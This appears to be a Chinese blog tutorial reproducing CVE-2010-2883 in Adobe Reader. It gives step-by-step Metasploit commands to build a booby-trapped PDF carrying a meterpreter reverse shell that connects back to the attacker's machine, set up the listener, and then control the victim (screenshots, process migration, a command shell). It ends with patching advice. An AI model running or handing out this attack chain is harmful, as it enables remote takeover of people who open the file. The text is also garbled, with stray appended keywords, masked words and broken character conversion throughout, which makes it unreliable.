[漏洞復現] CVE-2010-2883 Adobe Reader 打開pdf即刻中招

一、漏洞概述

在「漏洞界」,據稱有兩種大山是其餘軟件永遠沒法匹敵的,一個是Microsoft的Office套件,一個是Adobe的全家桶。這兩家出的漏洞,不管在出洞頻率、***危害性、或者是影響範圍等多個維度來看,都直接將其餘軟件遠遠甩開。若是要較真起來,到底誰是「漏洞之王」?shell

相信Adobe必定能「摘得桂冠」。windows

Adobe全家桶裏面的Adobe Flash Player、Adobe Reader、Adobe Acrobat等產品,能夠說是「難兄難弟」了,每一年都會貢獻一大堆漏洞。不少人就會問,爲何就他們家的產品漏洞最多,別人家的呢?安全

其實,全部軟件都或多或少有漏洞,沒有絕對安全的軟件,就看有沒有人去挖掘而已。微信

Adobe系列由於桌面安裝量很是龐大,並且官方彷佛安全開發工做這塊作的不是太好,大量的***或安全研究人員願意投入更多的時間來「挖洞」,一個成熟可利用的Adobe 0day漏洞,價值連城絕不誇張。tcp

這不,2018年2月份,Adobe Flash最新版就爆出CVE-2018-4878 高危漏洞,可致使電腦直接被getshell。而同一月份,思科旗下安全團隊TALOS披露了Adobe Reader最新版存在遠程代碼執行漏洞(CVE-2018-4901),簡單來講,「打開PDF文件可能致使被getshell」。目前,Adobe已經發布了針對此漏洞的安全補丁。ide

因爲Adobe Reader CVE-2018-4901 暫時尚未成熟可用的***代碼流傳出來,因此目前並無像Adobe Flash CVE-2018-4878 引發更普遍的關注。工具

可是,咱們要注意一點的是,此時此刻,一定有不少***正在嘗試寫***代碼,準備發起新一輪***。學習

雖然咱們無法直接對最新CVE-2018-4901進行復現,但從學習的角度,能夠拿一個很是經典的老漏洞 CVE-2010-2883 來進行實踐。這枚漏洞年限已久,但能夠直接作出「打開pdf即刻中招」的效果,能夠說是「簡單暴力」的典範了。字體

CVE-2010-2883漏洞原理:「Adobe Reader在處理CoolType字體文件的sing表時,存在棧溢出漏洞,當打開特製的惡意PDF文件時,可容許任意代碼遠程執行。」ui

影響版本:Adobe Reader 8.2.4 - 9.3.4


image.png



目前,Kali Linux Metasploit已經集成了相關的漏洞利用代碼,咱們能夠用較快的速度,對此漏洞進行復現。

二、漏洞復現環境

Kali Linux + Windows 7 sp1 
***機:Kali Linux (ip:172.16.70.216) 
靶機:Windows 7 sp1 (ip:172.16.70.199) 
軟件:Adobe Reader 9.3.exe

注:此實驗環境所用***機和靶機,跟以前文章所分享一致。爲了節省你們實驗時間,我將此實驗涉及到的工具所有上傳到網盤=> 
連接: https://pan.baidu.com/s/1585jIDZgRh7IzwE01dK-Bw 密碼:ie8m


三、實驗流程

①進入Kali Linux,使用Metasploit生成PDF***文件

搜索Adobe***模塊 
msf > search adobe_cooltype_sing 
調用***模塊 
msf > use exploit/windows/fileformat/adobe_cooltype_sing/ 
查看模塊詳情 
msf exploit(adobe_cooltype_sing) > info

image.png

調用meterpreter載荷,反向鏈接到***機 
msf  exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp 
設置Kali Linux的IP地址 
msf  exploit(adobe_cooltype_sing) > set LHOST 172.16.70.216 
設置本地監聽端口 
msf  exploit(adobe_cooltype_sing) > set LPORT 8888 
設置帶有後門程序的PDF文件 
msf  exploit(adobe_cooltype_sing) > set FILENAME PINGINGLAB.pdf 
執行***生成文件 
msf  exploit(adobe_cooltype_sing) > exploit 


image.png


②將PDF***文件拷貝至Kali Linux桌面

root@kali:~# cp /root/.msf4/local/PINGINGLAB.pdf /root/Desktop/PINGINGLAB.pdf 

image.png

③Metasploit開啓shell監聽會話,等待肉雞上線

使用handler監聽模塊 
msf > use exploit/multi/handler 
回彈一個tcp鏈接 
msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp 
設置監聽IP地址(跟PDF***文件一致) 
msf  exploit(handler) > set LHOST 172.16.70.216 
設置監聽的端口(跟PDF***文件一致) 
msf  exploit(handler) > set LPORT 8888 
開啓監聽 
msf  exploit(handler) > exploit 

image.png

④在Windows 7安裝Adobe Reader 9.3

image.png

image.png


image.png


⑤將PDF***文件拷貝到Windows 7並打開

image.png

image.png


⑥Metasploit獲取shell會話,並用Meterpreter控制肉雞

查看系統信息 
meterpreter > sysinfo 
查看當前用戶 
meterpreter > getuid 
截屏 
meterpreter > screenshot

image.png


image.png

獲取進程 
meterpreter > ps 
切換進程(考慮到這個漏洞利用過程,adobe reader會「卡殼」退出,因此須要快速切換到其餘系統進程,這樣會話纔不會失效) 
meterpreter > migrate 3748 


image.pngimage.png

獲取Dos Shell 
meterpreter > shell 
C:\Windows\system32>ipconfig 


image.png

實驗總結: 
能夠看到,最終因爲Adobe Reader 存在CVE-2010-2883這個高危漏洞,致使電腦打開特殊定製的pdf以後,直接變成肉雞。與以前文章中的Office和Flash 0day漏洞相似,真實環境下,不少***會利用此方法,結合社會工程學,例如經過誘導郵件、各類論壇、QQ羣、微信羣等多渠道,誘導用戶下載並打開,而只要打開的用戶,就直接中招。

在這裏也呼籲你們:日常要很是當心陌生辦公文件,不管是pdf仍是word等,打開以前必定要明確來源,或者用殺毒軟件先殺毒,再打開。另外,就是儘可能保證電腦的軟件處於最新版,這樣才能最大程度下降被***的概率。


四、漏洞修復

①直接到Adobe官網,下載Adobe Reader最新版本; 
②安裝常見殺毒軟件,開啓實時防禦和殺毒引擎實時升級。



相關推文:

[漏洞復現] MS17-010 基於"永恆之藍"實現Windows Getshell

[漏洞復現] CVE-2017-11882 通殺全部Office版本

[漏洞復現] CVE-2017-16995 Ubuntu16.04

相關文章
相關標籤/搜索